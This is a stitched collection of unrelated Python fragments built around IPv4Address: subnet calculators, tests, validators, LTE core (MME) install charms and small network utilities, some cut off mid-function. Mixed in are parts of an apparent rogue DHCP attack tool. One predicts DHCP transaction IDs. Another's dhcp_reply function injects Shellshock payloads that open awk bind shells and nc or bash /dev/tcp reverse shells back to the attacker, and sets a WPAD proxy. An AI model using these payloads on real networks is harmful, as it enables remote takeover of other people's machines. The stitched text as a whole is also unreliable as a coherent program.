return "B" elif bit_counter is 2: return "C" elif bit_counter is 3: return "D" elif bit_counter is 4: return "E" ######## # Main # ######## while True: try: ip = IPv4Address(input("Enter IP: ")) except AddressValueError: print("This IP is invalid\n") continue try: network = IPv4Network(str(ip) + "/" + input("Enter Subnet Mask: "), strict=False) except NetmaskValueError: print("This subnet mask is invalid\n") continue print("Network: {}".format(network[0])) print("First Host: {}".format(network[1])) print("Last Host: {}".format(network[-2])) print("Broadcast: {}".format(network[-1]))
from datetime import datetime
from ipaddress import IPv4Address

from pytest import mark
from six import text_type  # text/str alias used by these tests (assumed import)

from openvpn_status.utils import (
    parse_time, parse_peer, parse_filesize, PeerAddress, FileSize)


@mark.parametrize('text,time', [
    ('Thu Jun 18 04:23:03 2015', datetime(2015, 6, 18, 4, 23, 3)),
    ('Thu Jun 18 04:08:39 2015', datetime(2015, 6, 18, 4, 8, 39)),
    ('Thu Jun 18 07:57:25 2015', datetime(2015, 6, 18, 7, 57, 25)),
    (datetime(2015, 6, 18, 7, 57, 25), datetime(2015, 6, 18, 7, 57, 25)),
])
def test_parse_time(text, time):
    assert parse_time(text) == time


@mark.parametrize('text,peer', [
    ('10.0.0.1:49502', PeerAddress(IPv4Address('10.0.0.1'), 49502)),
    ('10.0.0.2:64169', PeerAddress(IPv4Address('10.0.0.2'), 64169)),
    ('10.0.0.3:63414', PeerAddress(IPv4Address('10.0.0.3'), 63414)),
    (PeerAddress('10.0.0.1', 80), PeerAddress('10.0.0.1', 80)),
])
def test_parse_peer(text, peer):
    assert parse_peer(text) == peer
    assert text_type(text) == text_type(peer)


@mark.parametrize('text,humanized', [
    (10240, '10.2 kB'),
    ('10240', '10.2 kB'),
    (FileSize(10240), '10.2 kB'),
])
def test_parse_filesize(text, humanized):
from selfsigned import generate_selfsigned_cert
from ipaddress import IPv4Address

if __name__ == '__main__':
    from config import ssl_cn, ssl_context

    hostname = ssl_cn
    public_ip, private_ip = [IPv4Address('127.0.0.1')] * 2

    files = dict()
    files[ssl_context[0]], files[ssl_context[1]] = generate_selfsigned_cert(
        hostname, public_ip, private_ip)

    for filename, content in files.items():
        with open(filename, 'wb') as f:
            f.write(content)
from random import getrandbits
from ipaddress import IPv4Address


def generate_random_ipv4():
    bits = getrandbits(32)    # generate an integer with 32 random bits
    addr = IPv4Address(bits)  # build an IPv4Address object from that integer
    return str(addr)
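Because getrandbits(32) can produce any 32-bit value, the result may fall in private, multicast or otherwise reserved space. A small usage sketch, assuming generate_random_ipv4 above is in scope, that filters such addresses with the standard IPv4Address properties:

def generate_random_public_ipv4():
    # Keep drawing until the address is outside the common special-use ranges.
    while True:
        addr = IPv4Address(generate_random_ipv4())
        if not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved):
            return str(addr)

print(generate_random_ipv4())         # any value in 0.0.0.0 .. 255.255.255.255
print(generate_random_public_ipv4())  # only addresses outside special-use ranges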
# region 3. Predict next DHCP transaction ID
if technique_index == 3:

    # region Find free IP in local network
    if new_target_ip_address is None:

        # region Fast scan localnet with arp_scan
        base.print_info(
            'Search for free IP addresses on the local network ...')
        localnet_ip_addresses = scanner.find_ip_in_local_network(
            listen_network_interface)
        # endregion

        index = 0
        while new_target_ip_address is None:
            check_ip = str(IPv4Address(first_ip_address) + index)
            if check_ip != your_ip_address:
                if check_ip not in localnet_ip_addresses:
                    new_target_ip_address = check_ip
                else:
                    index += 1
            else:
                index += 1

        base.print_info('Find new IP address: ', new_target_ip_address, ' for target')
    # endregion

    # region Start Rogue DHCP server with predict next transaction ID
    rogue_dhcp_server_predict_trid(listen_network_interface, target_mac_address,
from link_layer import data_link
from ipaddress import IPv4Address

# Here the user at the other end of the link receives the message sent to it, the 'l_sdu'.
# To do so, it uses the data link layer primitive (data_link), which is responsible for
# listening on the network and returning the delivered data. Because of problems on the
# network, some frames may get corrupted, but this is invisible to the user: the link layer
# on this side reports when errors occurred and asks for the frame again. If everything is
# correct, it signals that the next frame can be sent.

# For a test between 'localhost' <--> 'localhost'.
l_sdu = data_link.Data_Request(IPv4Address("127.0.0.1"), IPv4Address("127.0.0.1"))

# For a test against the VM running 'request.py'. The receiving VM has IP '192.168.0.100'.
# l_sdu = data_link.Data_Request(IPv4Address("192.168.0.107"), IPv4Address("192.168.0.100"))

# Print the received message to the console.
print('RECEIVED:', l_sdu)

# At the end of execution, the file 'request_log.csv' will contain all the details of what
# happened in the link layer of the receiving interface.
def main() -> None: logging.basicConfig( level=logging.INFO, format= f"%(asctime)s - %(levelname)s %(name)s %(threadName)s : - %(message)s", datefmt="%Y-%m-%dT%H:%M:%S%z", ) args = my_parser.parse_args() my_args = vars(args) quiet = my_args["quiet"] client_socket = None if my_args["socket"]: # TODO: Socket needs testing or conversion to zmq ip_port = my_args["socket"].split(":") try: ip_address = IPv4Address(ip_port[0]) except AddressValueError: ip_address = IPv6Address(ip_port[0]) port = int(ip_port[1]) client_socket = socket(AF_INET, SOCK_STREAM) open_socket(client_socket, ip_address, port) use_test_node: bool = os.getenv("USE_TEST_NODE", "False").lower() in { "true", "1", "t", } if my_args['test']: use_test_node = True if use_test_node: hive = beem.Hive(node=TEST_NODE[0]) else: hive = beem.Hive() """ do we want to see post information from podping unauthorized posts? """ if my_args["include_unauthorized"]: include_unauthorized = True else: include_unauthorized = False """ do we want to see post information from non-podping posts?? """ if my_args["include_nonpodping"]: include_non_podping = True else: include_non_podping = False """ do we want to write post information to csv? """ if my_args["write_csv"]: write_csv = True else: write_csv = False """ do we want periodic reports? """ if my_args["reports"] == 0: reports = False else: reports = True if use_test_node: logging.info("---------------> Using Test Node " + TEST_NODE[0]) else: logging.info("---------------> Using Main Hive Chain ") # scan_history will look back over the last 1 hour reporting every 15 minute chunk if my_args["old"] or my_args["block"]: report_minutes = my_args["reports"] if my_args["block"]: block_num = my_args["block"] scan_history(hive, block_num=block_num, report_freq=report_minutes, reports=reports, quiet=quiet, include_unauthorized=include_unauthorized, include_non_podping=include_non_podping, write_csv=write_csv) else: hours_ago = timedelta(hours=my_args["old"]) scan_history(hive, hours_ago=hours_ago, report_freq=report_minutes, reports=reports, quiet=quiet, include_unauthorized=include_unauthorized, include_non_podping=include_non_podping, write_csv=write_csv) history_only = my_args["history_only"] if not history_only: # scan_live will resume live scanning the chain and report every 5 minutes or # when a notification arrives scan_live(hive, my_args["reports"], reports, quiet=quiet, client_socket=client_socket, include_unauthorized=include_unauthorized, include_non_podping=include_non_podping, write_csv=write_csv) else: logging.info("history_only is set. existing")
def configure_mme(): # ====== Install MME ===================================================== # For a documentation of the installation procedure, see: # https://github.com/OPENAIRINTERFACE/openair-cn/wiki/OpenAirSoftwareSupport#install-mme gitDirectory = 'openair-cn' hssS6a_IPv4Address = IPv4Address(action_get('hss-S6a-address')) mmeS1C_IPv4Interface = IPv4Interface(action_get('mme-S1C-ipv4-interface')) mmeS11_IPv4Interface = IPv4Interface(action_get('mme-S11-ipv4-interface')) mmeS10_IPv4Interface = IPv4Interface('192.168.10.110/24') spwgcS11_IPv4Interface = IPv4Interface( action_get('spgwc-S11-ipv4-interface')) networkRealm = action_get('network-realm') networkMCC = int(action_get('network-mcc')) networkMNC = int(action_get('network-mnc')) networkOP = action_get('network-op') networkK = action_get('network-k') networkIMSIFirst = action_get('network-imsi-first') networkMSISDNFirst = action_get('network-msisdn-first') networkUsers = int(action_get('network-users')) TAC_SGW_TEST = 7 TAC_SGW_0 = 600 TAC_MME_0 = 601 TAC_MME_1 = 602 tac_sgw_test = '{:04x}'.format(TAC_SGW_TEST) tac_sgw_0 = '{:04x}'.format(TAC_SGW_0) tac_mme_0 = '{:04x}'.format(TAC_MME_0) tac_mme_1 = '{:04x}'.format(TAC_MME_1) # Prepare network configurations: mmeS6a_IfName = 'ens4' mmeS11_IfName = 'ens5' mmeS1C_IfName = 'ens6' mmeS10_IfName = 'dummy0:m10' # NOTE: # Double escaping is required for \ and " in "command" string! # 1. Python # 2. bash -c "<command>" # That is: $ => \$ ; \ => \\ ; " => \\\" commands = """\ echo \\\"###### Building MME ####################################################\\\" && \\ export MAKEFLAGS=\\\"-j`nproc`\\\" && \\ cd /home/nornetpp/src && \\ cd {gitDirectory} && \\ cd scripts && \\ mkdir -p logs && \\ echo \\\"====== Building dependencies ... ======\\\" && \\ ./build_mme --check-installed-software --force >logs/build_mme-1.log 2>&1 && \\ echo \\\"====== Building service ... 
======\\\" && \\ ./build_mme --clean >logs/build_mme-2.log 2>&1 && \\ echo \\\"###### Creating MME configuration files ###############################\\\" && \\ echo \\\"127.0.1.1 mme.{networkRealm} mme\\\" | sudo tee -a /etc/hosts && \\ echo \\\"{hssS6a_IPv4Address} hss.{networkRealm} hss\\\" | sudo tee -a /etc/hosts && \\ openssl rand -out \$HOME/.rnd 128 && \\ INSTANCE=1 && \\ PREFIX='/usr/local/etc/oai' && \\ sudo mkdir -m 0777 -p \$PREFIX && \\ sudo mkdir -m 0777 -p \$PREFIX/freeDiameter && \\ sudo cp ../etc/mme_fd.sprint.conf \$PREFIX/freeDiameter/mme_fd.conf && \\ sudo cp ../etc/mme.conf \$PREFIX && \\ declare -A MME_CONF && \\ MME_CONF[@MME_S6A_IP_ADDR@]=\\\"127.0.0.11\\\" && \\ MME_CONF[@INSTANCE@]=\$INSTANCE && \\ MME_CONF[@PREFIX@]=\$PREFIX && \\ MME_CONF[@REALM@]='{networkRealm}' && \\ MME_CONF[@PID_DIRECTORY@]='/var/run' && \\ MME_CONF[@MME_FQDN@]=\\\"mme.{networkRealm}\\\" && \\ MME_CONF[@HSS_HOSTNAME@]='hss' && \\ MME_CONF[@HSS_FQDN@]=\\\"hss.{networkRealm}\\\" && \\ MME_CONF[@HSS_IP_ADDR@]='{hssS6a_IPv4Address}' && \\ MME_CONF[@MCC@]='{networkMCC}' && \\ MME_CONF[@MNC@]='{networkMNC}' && \\ MME_CONF[@MME_GID@]='32768' && \\ MME_CONF[@MME_CODE@]='3' && \\ MME_CONF[@TAC_0@]='600' && \\ MME_CONF[@TAC_1@]='601' && \\ MME_CONF[@TAC_2@]='602' && \\ MME_CONF[@MME_INTERFACE_NAME_FOR_S1_MME@]='{mmeS1C_IfName}' && \\ MME_CONF[@MME_IPV4_ADDRESS_FOR_S1_MME@]='{mmeS1C_IPv4Interface}' && \\ MME_CONF[@MME_INTERFACE_NAME_FOR_S11@]='{mmeS11_IfName}' && \\ MME_CONF[@MME_IPV4_ADDRESS_FOR_S11@]='{mmeS11_IPv4Interface}' && \\ MME_CONF[@MME_INTERFACE_NAME_FOR_S10@]='{mmeS10_IfName}' && \\ MME_CONF[@MME_IPV4_ADDRESS_FOR_S10@]='{mmeS10_IPv4Interface}' && \\ MME_CONF[@OUTPUT@]='CONSOLE' && \\ MME_CONF[@SGW_IPV4_ADDRESS_FOR_S11_TEST_0@]='{spwgcS11_IPv4Interface}' && \\ MME_CONF[@SGW_IPV4_ADDRESS_FOR_S11_0@]='{spwgcS11_IPv4Interface}' && \\ MME_CONF[@PEER_MME_IPV4_ADDRESS_FOR_S10_0@]='0.0.0.0/24' && \\ MME_CONF[@PEER_MME_IPV4_ADDRESS_FOR_S10_1@]='0.0.0.0/24' && \\ MME_CONF[@TAC-LB_SGW_TEST_0@]={tac_sgw_test_lo} && \\ MME_CONF[@TAC-HB_SGW_TEST_0@]={tac_sgw_test_hi} && \\ MME_CONF[@MCC_SGW_0@]={networkMCC} && \\ MME_CONF[@MNC3_SGW_0@]={networkMNC:03d} && \\ MME_CONF[@TAC-LB_SGW_0@]={tac_sgw_0_lo} && \\ MME_CONF[@TAC-HB_SGW_0@]={tac_sgw_0_hi} && \\ MME_CONF[@MCC_MME_0@]={networkMCC} && \\ MME_CONF[@MNC3_MME_0@]={networkMNC:03d} && \\ MME_CONF[@TAC-LB_MME_0@]={tac_mme_0_lo} && \\ MME_CONF[@TAC-HB_MME_0@]={tac_mme_0_hi} && \\ MME_CONF[@MCC_MME_1@]={networkMCC} && \\ MME_CONF[@MNC3_MME_1@]={networkMNC:03d} && \\ MME_CONF[@TAC-LB_MME_1@]={tac_mme_1_lo} && \\ MME_CONF[@TAC-HB_MME_1@]={tac_mme_1_hi} && \\ for K in \\\"\${{!MME_CONF[@]}}\\\"; do sudo egrep -lRZ \\\"\$K\\\" \$PREFIX | xargs -0 -l sudo sed -i -e \\\"s|\$K|\${{MME_CONF[\$K]}}|g\\\" ; ret=\$?;[[ ret -ne 0 ]] && echo \\\"Tried to replace \$K with \${{MME_CONF[\$K]}}\\\" || true ; done && \\ sudo ./check_mme_s6a_certificate \$PREFIX/freeDiameter mme.{networkRealm} >logs/check_mme_s6a_certificate.log 2>&1 && \\ echo \\\"====== Preparing SystemD Unit ... 
======\\\" && \\ ( echo \\\"[Unit]\\\" && \\ echo \\\"Description=Mobility Management Entity (MME)\\\" && \\ echo \\\"After=ssh.target\\\" && \\ echo \\\"\\\" && \\ echo \\\"[Service]\\\" && \\ echo \\\"ExecStart=/bin/sh -c \\\'exec /usr/local/bin/mme -c /usr/local/etc/oai/mme.conf >>/var/log/mme.log 2>&1\\\'\\\" && \\ echo \\\"KillMode=process\\\" && \\ echo \\\"Restart=on-failure\\\" && \\ echo \\\"RestartPreventExitStatus=255\\\" && \\ echo \\\"WorkingDirectory=/home/nornetpp/src/openair-cn/scripts\\\" && \\ echo \\\"\\\" && \\ echo \\\"[Install]\\\" && \\ echo \\\"WantedBy=multi-user.target\\\" ) | sudo tee /lib/systemd/system/mme.service && \\ sudo systemctl daemon-reload && \\ echo \\\"###### Installing sysstat #############################################\\\" && \\ DEBIAN_FRONTEND=noninteractive sudo apt install -y -o Dpkg::Options::=--force-confold -o Dpkg::Options::=--force-confdef --no-install-recommends sysstat && \\ sudo sed -e \\\"s/^ENABLED=.*$/ENABLED=\\\\\\"true\\\\\\"/g\\\" -i /etc/default/sysstat && \\ sudo sed -e \\\"s/^SADC_OPTIONS=.*$/SADC_OPTIONS=\\\\\\"-S ALL\\\\\\"/g\\\" -i /etc/sysstat/sysstat && \\ sudo service sysstat restart && \\ echo \\\"###### Done! ##########################################################\\\"""".format( gitDirectory=gitDirectory, hssS6a_IPv4Address=hssS6a_IPv4Address, mmeS1C_IfName=mmeS1C_IfName, mmeS1C_IPv4Interface=mmeS1C_IPv4Interface, mmeS11_IfName=mmeS11_IfName, mmeS11_IPv4Interface=mmeS11_IPv4Interface, mmeS10_IfName=mmeS10_IfName, mmeS10_IPv4Interface=mmeS10_IPv4Interface, spwgcS11_IPv4Interface=spwgcS11_IPv4Interface, networkRealm=networkRealm, networkMCC=networkMCC, networkMNC=networkMNC, networkOP=networkOP, networkK=networkK, networkIMSIFirst=networkIMSIFirst, networkMSISDNFirst=networkMSISDNFirst, networkUsers=networkUsers, tac_sgw_test_hi=tac_sgw_test[0:2], tac_sgw_test_lo=tac_sgw_test[2:4], tac_sgw_0_hi=tac_sgw_0[0:2], tac_sgw_0_lo=tac_sgw_0[2:4], tac_mme_0_hi=tac_mme_0[0:2], tac_mme_0_lo=tac_mme_0[2:4], tac_mme_1_hi=tac_mme_1[0:2], tac_mme_1_lo=tac_mme_1[2:4]) runShellCommands(commands, 'configure_mme: configuring MME', 'actions.configure-mme', 'mmecharm.configured-mme')
def sort_networks(networks):
    return sorted(networks, key=lambda n: IPv4Address(n.prefix))
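A short sketch of why the key converts to IPv4Address before sorting (the Network namedtuple here is a hypothetical stand-in for whatever objects carry the .prefix attribute): plain string comparison orders '10.0.0.10' before '10.0.0.2', numeric comparison does not.

from collections import namedtuple
from ipaddress import IPv4Address

# Hypothetical stand-in for the objects passed to sort_networks above.
Network = namedtuple("Network", ["prefix"])

networks = [Network("10.0.0.10"), Network("10.0.0.9"), Network("10.0.0.2")]

print(sorted(n.prefix for n in networks))
# ['10.0.0.10', '10.0.0.2', '10.0.0.9']  <- lexicographic, wrong order

print([n.prefix for n in sorted(networks, key=lambda n: IPv4Address(n.prefix))])
# ['10.0.0.2', '10.0.0.9', '10.0.0.10']  <- numeric, as intended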
def convert(self, value: str) -> Union[str, None]:
    try:
        ip = IPv4Address(value)
        return str(ip)
    except AddressValueError:
        return None
from datetime import timedelta
from ipaddress import IPv4Address

LIMITING_REQ_N = 100
LIMITING_PERIOD = timedelta(minutes=2)
IP_MASK = IPv4Address("255.255.255.0")
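The limiter code that consumes these constants is not shown here; one plausible sketch of how a mask like IP_MASK could be applied is to AND it with the client address so that every request from the same /24 shares a rate-limit bucket:

from ipaddress import IPv4Address

IP_MASK = IPv4Address("255.255.255.0")

def limit_key(client_ip: str) -> IPv4Address:
    # Mask off the host bits so e.g. 203.0.113.5 and 203.0.113.200
    # both map to the bucket key 203.0.113.0.
    return IPv4Address(int(IPv4Address(client_ip)) & int(IP_MASK))

print(limit_key("203.0.113.5"))    # 203.0.113.0
print(limit_key("203.0.113.200"))  # 203.0.113.0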
def ip_v4_address_validator(v: Any) -> IPv4Address:
    if isinstance(v, IPv4Address):
        return v

    with change_exception(errors.IPv4AddressError, ValueError):
        return IPv4Address(v)
def ipv4_is_defined(address):
    """
    The function for checking if an IPv4 address is defined (does not need to
    be resolved).

    Args:
        address: An IPv4 address in string format.

    Returns:
        Tuple:

        :Boolean: True if given address is defined, otherwise False
        :String: IETF assignment name if given address is defined, otherwise ''
        :String: IETF assignment RFC if given address is defined, otherwise ''
    """

    # Initialize the IP address object.
    query_ip = IPv4Address(str(address))

    # This Network
    if query_ip in IPv4Network('0.0.0.0/8'):
        return True, 'This Network', 'RFC 1122, Section 3.2.1.3'

    # Loopback
    elif query_ip.is_loopback:
        return True, 'Loopback', 'RFC 1122, Section 3.2.1.3'

    # Link Local
    elif query_ip.is_link_local:
        return True, 'Link Local', 'RFC 3927'

    # IETF Protocol Assignments
    elif query_ip in IPv4Network('192.0.0.0/24'):
        return True, 'IETF Protocol Assignments', 'RFC 5736'

    # TEST-NET-1
    elif query_ip in IPv4Network('192.0.2.0/24'):
        return True, 'TEST-NET-1', 'RFC 5737'

    # 6to4 Relay Anycast
    elif query_ip in IPv4Network('192.88.99.0/24'):
        return True, '6to4 Relay Anycast', 'RFC 3068'

    # Network Interconnect Device Benchmark Testing
    elif query_ip in IPv4Network('198.18.0.0/15'):
        return (True,
                'Network Interconnect Device Benchmark Testing',
                'RFC 2544')

    # TEST-NET-2
    elif query_ip in IPv4Network('198.51.100.0/24'):
        return True, 'TEST-NET-2', 'RFC 5737'

    # TEST-NET-3
    elif query_ip in IPv4Network('203.0.113.0/24'):
        return True, 'TEST-NET-3', 'RFC 5737'

    # Multicast
    elif query_ip.is_multicast:
        return True, 'Multicast', 'RFC 3171'

    # Limited Broadcast
    elif query_ip in IPv4Network('255.255.255.255/32'):
        return True, 'Limited Broadcast', 'RFC 919, Section 7'

    # Private-Use Networks
    elif query_ip.is_private:
        return True, 'Private-Use Networks', 'RFC 1918'

    return False, '', ''
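A few example calls against the function above (ipaddress imports as in the surrounding module):

print(ipv4_is_defined('192.0.2.45'))  # (True, 'TEST-NET-1', 'RFC 5737')
print(ipv4_is_defined('10.1.2.3'))    # (True, 'Private-Use Networks', 'RFC 1918')
print(ipv4_is_defined('8.8.8.8'))     # (False, '', '')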
def api_createtracker(self, fname, fsize, descrip, md5, ip, port): """Implements the createtracker API command. All arguments are expected to be strings, but *fsize* and *port* should be castable to :class:`int` and *ip* should be castable to :class:`~ipaddress.IPv4Address`. """ fname, descrip, md5 = map(str, (fname, descrip, md5)) try: fsize, port = int(fsize), int(port) except ValueError: print("Either fsize ({!r}) or port ({!r}) is not a valid " \ "integer".format(fsize,port)) self.request.sendall(b"<createtracker fail>") return try: ip = IPv4Address(ip) except AddressValueError: print("Malformed IP Address: {!r}".format(ip)) self.request.sendall(b"<createtracker fail>") return tfname = "{}.track".format(fname) tfpath = os.path.join(self.server.torrents_dir, tfname) #check if .track file already exists if os.path.exists(tfpath): print("Couldn't create tracker, already exists.") self.request.sendall(b"<createtracker ferr>") return #create a new trackerfile try: tf = trackerfile.trackerfile(fname, fsize, descrip, md5) except Exception as err: print(err) self.request.sendall(b"<createtracker fail>") return print("Created new trackerfile instance for fname={!r}".format(fname)) #add creator as peer try: tf.updatePeer(ip, port, 0, fsize - 1) except Exception as err: print(err) self.request.sendall(b"<createtracker fail>") return print("Added {} (creator) to trackerfile".format(ip)) #write tracker to file with open(tfpath, 'w') as fl: fcntl.lockf(fl, fcntl.LOCK_EX) tf.writeTo(fl) fcntl.lockf(fl, fcntl.LOCK_UN) print("Wrote trackerfile to disk.") self.request.sendall(b"<createtracker succ>") return
A: 1-127
B: 128-191
C: 192-223
D: 224-239
"""
from ipaddress import IPv4Address

ipv4_addr = False
while not ipv4_addr:
    address = input("Enter an IP address in dotted-decimal format: ")
    try:
        ipv4_addr = IPv4Address(address)
    except ValueError:
        print('Incorrect IPv4 address.')

first = int(str(ipv4_addr).split('.')[0])

if ipv4_addr.is_multicast:
    print('multicast')
elif str(ipv4_addr) == '255.255.255.255':
    print('local broadcast')
elif str(ipv4_addr) == '0.0.0.0':
    print('unassigned')
elif first >= 0 and first < 224:
    print('unicast')
else:
    print('unused')
def prepare_mme_build(): # ====== Install MME ===================================================== # For a documentation of the installation procedure, see: # https://github.com/OPENAIRINTERFACE/openair-cn/wiki/OpenAirSoftwareSupport#install-mme gitRepository = action_get('mme-git-repository') gitCommit = action_get('mme-git-commit') gitDirectory = 'openair-cn' mmeS1C_IPv4Interface = IPv4Interface(action_get('mme-S1C-ipv4-interface')) mmeS1C_IPv4Gateway = IPv4Address(action_get('mme-S1C-ipv4-gateway')) if action_get('mme-S1C-ipv6-interface') != '': mmeS1C_IPv6Interface = IPv6Interface( action_get('mme-S1C-ipv6-interface')) else: mmeS1C_IPv6Interface = None if action_get('mme-S1C-ipv6-gateway') != '': mmeS1C_IPv6Gateway = IPv6Address(action_get('mme-S1C-ipv6-gateway')) else: mmeS1C_IPv6Gateway = None # Prepare network configurations: mmeS6a_IfName = 'ens4' mmeS11_IfName = 'ens5' mmeS1C_IfName = 'ens6' configurationS6a = configureInterface(mmeS6a_IfName, IPv4Interface('0.0.0.0/0')) configurationS11 = configureInterface(mmeS11_IfName, IPv4Interface('0.0.0.0/0')) configurationS1C = configureInterface(mmeS1C_IfName, mmeS1C_IPv4Interface, mmeS1C_IPv4Gateway, mmeS1C_IPv6Interface, mmeS1C_IPv6Gateway) # S10 dummy interface: mmeS10_IfName = 'dummy0:m10' configurationS10 = configureInterface(mmeS10_IfName, IPv4Interface('192.168.10.110/24')) # NOTE: # Double escaping is required for \ and " in "command" string! # 1. Python # 2. bash -c "<command>" # That is: $ => \$ ; \ => \\ ; " => \\\" commands = """\ echo \\\"###### Preparing system ###############################################\\\" && \\ echo -e \\\"{configurationS6a}\\\" | sudo tee /etc/network/interfaces.d/61-{mmeS6a_IfName} && sudo ifup {mmeS6a_IfName} || true && \\ echo -e \\\"{configurationS11}\\\" | sudo tee /etc/network/interfaces.d/62-{mmeS11_IfName} && sudo ifup {mmeS11_IfName} || true && \\ echo -e \\\"{configurationS1C}\\\" | sudo tee /etc/network/interfaces.d/63-{mmeS1C_IfName} && sudo ifup {mmeS1C_IfName} || true && \\ sudo ip link add dummy0 type dummy || true && \\ echo -e \\\"{configurationS10}\\\" | sudo tee /etc/network/interfaces.d/64-{mmeS10_IfName} && sudo ifup {mmeS10_IfName} || true && \\ echo \\\"###### Preparing sources ##############################################\\\" && \\ cd /home/nornetpp/src && \\ if [ ! -d \\\"{gitDirectory}\\\" ] ; then git clone --quiet {gitRepository} {gitDirectory} && cd {gitDirectory} ; else cd {gitDirectory} && git pull ; fi && \\ git checkout {gitCommit} && \\ cd scripts && \\ echo \\\"###### Done! ##########################################################\\\"""".format( gitRepository=gitRepository, gitDirectory=gitDirectory, gitCommit=gitCommit, mmeS6a_IfName=mmeS6a_IfName, mmeS11_IfName=mmeS11_IfName, mmeS1C_IfName=mmeS1C_IfName, mmeS10_IfName=mmeS10_IfName, configurationS6a=configurationS6a, configurationS11=configurationS11, configurationS1C=configurationS1C, configurationS10=configurationS10) runShellCommands(commands, 'prepare_mme_build: preparing MME build', 'actions.prepare-mme-build', 'mmecharm.prepared-mme-build')
def dhcp_reply(request): global offer_ip_address global target_mac_address global target_ip_address global requested_ip_address global transaction_id_global global number_of_dhcp_request global shellshock_url global domain global your_mac_address global current_network_interface global arp_req_router global arp_req_your_ip global possible_output global router_ip_address global tm global is_new_connection SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) if request.haslayer(DHCP): domain = bytes(args.domain) offer_ip_address = args.first_offer_ip transaction_id = request[BOOTP].xid target_mac_address = ":".join("{:02x}".format(ord(c)) for c in request[BOOTP].chaddr[0:6]) if request[DHCP].options[0][1] == 1: is_new_connection = True print Base.c_info + "DHCP DISCOVER from: " + target_mac_address + " transaction id: " + hex( transaction_id) if args.new: if target_ip_address is not None: requested_ip = target_ip_address else: requested_ip = offer_ip_address for option in request[DHCP].options: if option[0] == "requested_addr": requested_ip = str(option[1]) transaction_id_global = transaction_id requested_ip_address = requested_ip tm.add_task(ack_sender) if target_ip_address is not None: offer_ip_address = target_ip_address else: next_offer_ip_address = IPv4Address( unicode(args.first_offer_ip)) + number_of_dhcp_request if IPv4Address(next_offer_ip_address) < IPv4Address( unicode(args.last_offer_ip)): number_of_dhcp_request += 1 offer_ip_address = str(next_offer_ip_address) else: number_of_dhcp_request = 0 offer_ip_address = args.first_offer_ip offer_packet = make_dhcp_offer_packet(transaction_id) SOCK.send(offer_packet) print Base.c_info + "Send offer response!" if request[DHCP].options[0][1] == 8: ciaddr = request[BOOTP].ciaddr giaddr = request[BOOTP].giaddr chaddr = request[BOOTP].chaddr flags = request[BOOTP].flags print Base.c_info + "DHCP INFORM from: " + target_mac_address + " transaction id: " + hex(transaction_id) + \ " client ip: " + ciaddr option_operation = pack("!3B", 53, 1, 5) # DHCPACK operation option_netmask = pack("!" "2B" "4s", 1, 4, inet_aton(network_mask)) domain = pack("!%ds" % (len(domain)), domain) option_domain = pack("!2B", 15, len(domain)) + domain option_router = pack("!" "2B" "4s", 3, 4, inet_aton(router_ip_address)) option_dns = pack("!" "2B" "4s", 6, 4, inet_aton(dns_server_ip_address)) option_server_id = pack( "!" "2B" "4s", 54, 4, inet_aton(dhcp_server_ip_address)) # Set server id option_end = pack("B", 255) dhcp_options = option_operation + option_server_id + option_netmask + option_domain + option_router + \ option_dns + option_end dhcp = DHCP_raw() ack_packet = dhcp.make_packet( ethernet_src_mac=dhcp_server_mac_address, ethernet_dst_mac=target_mac_address, ip_src=dhcp_server_ip_address, ip_dst=ciaddr, udp_src_port=67, udp_dst_port=68, bootp_message_type=2, bootp_transaction_id=transaction_id, bootp_flags=int(flags), bootp_client_ip=ciaddr, bootp_your_client_ip="0.0.0.0", bootp_next_server_ip="0.0.0.0", bootp_relay_agent_ip=giaddr, bootp_client_hw_address=target_mac_address, dhcp_options=dhcp_options, padding=18) SOCK.send(ack_packet) print Base.c_info + "Send inform ack response!" 
if request[DHCP].options[0][1] == 3: dhcpnak = False requested_ip = offer_ip_address for option in request[DHCP].options: if option[0] == "requested_addr": requested_ip = str(option[1]) print Base.c_info + "DHCP REQUEST from: " + target_mac_address + " transaction id: " + \ hex(transaction_id) + " requested ip: " + requested_ip if args.cisco: ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip, "ff:ff:ff:ff:ff:ff", "255.255.255.255") SOCK.send(ack_packet) print Base.c_info + "Send ack response to Cisco device: " + target_mac_address else: if args.apple: ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip) SOCK.send(ack_packet) print Base.c_info + "Send ack response Apple device: " + target_mac_address else: if target_ip_address is not None: if requested_ip != target_ip_address: nak_packet = make_dhcp_nak_packet( transaction_id, requested_ip) SOCK.send(nak_packet) print Base.c_info + "Send nak response!" dhcpnak = True else: if IPv4Address(unicode(requested_ip)) < IPv4Address(unicode(args.first_offer_ip)) \ or IPv4Address(unicode(requested_ip)) > IPv4Address(unicode(args.last_offer_ip)): nak_packet = make_dhcp_nak_packet( transaction_id, requested_ip) SOCK.send(nak_packet) print Base.c_info + "Send nak response!" dhcpnak = True if not dhcpnak: net_settings = args.ip_path + "ip addr add " + requested_ip + \ "/" + str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";" global payload if args.shellshock_command is not None: payload = args.shellshock_command if args.bind_shell: payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \ "/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &" if args.nc_reverse_shell: payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \ your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &" if args.nce_reverse_shell: payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str( args.reverse_port) + " 2>&1 &" if args.bash_reverse_shell: payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \ "/" + str(args.reverse_port) + " 0>&1 &" if payload is not None: if not args.without_network: payload = net_settings + payload if args.without_base64: shellshock_url = "() { :" + "; }; " + payload else: payload = b64encode(payload) shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")" if shellshock_url is not None: if len(shellshock_url) > 255: print Base.c_error + "Len of command is very big! Current len: " + str( len(shellshock_url)) shellshock_url = "A" global proxy if args.proxy is None: proxy = bytes("http://" + dhcp_server_ip_address + ":8080/wpad.dat") else: proxy = bytes(args.proxy) ack_packet = make_dhcp_ack_packet( transaction_id, requested_ip) SOCK.send(ack_packet) print Base.c_info + "Send ack response!" 
